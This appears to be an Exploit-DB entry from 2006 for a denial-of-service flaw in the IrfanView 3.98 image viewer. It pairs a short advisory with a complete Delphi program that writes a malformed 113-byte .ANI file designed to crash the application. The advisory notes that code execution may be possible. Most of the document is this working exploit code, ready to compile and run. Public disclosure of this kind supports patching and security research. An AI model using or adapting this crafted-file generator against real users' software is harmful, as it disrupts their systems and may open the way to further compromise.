IrfanView 3.98 - '.ANI' Image File Denial of Service

EDB-ID:

28369


Author:

sehato

Type:

dos


Platform:

Windows

Date:

2006-08-09


source: https://www.securityfocus.com/bid/19452/info

IrfanView is prone to a denial-of-service vulnerability. 

A remote attacker may crash the application, resulting in denial-of-service conditions to legitimate users. 

This issue may potentially be exploited to execute arbitrary machine code, but this has not been
confirmed.

Version 3.98.0 is vulnerable to this issue; other versions may also be affected.

program ani;
 {$APPTYPE CONSOLE}
 const
   FileName='file.ani';
   Len=113;
   Buf=#$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24#$00+
   #$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
   #$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00+
   #$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00#$00+
   #$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02#$00+
   #$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00#$01;
 var
   F:File;
   I:Byte;
 begin
   AssignFile(F,FileName);
   Rewrite(F,1);
   BlockWrite(F, Buf, Len);
   CloseFile(F);
 end.